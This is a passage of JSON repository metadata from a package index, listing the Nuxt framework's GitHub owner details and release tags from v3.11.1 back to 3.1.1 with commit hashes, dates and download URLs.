Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar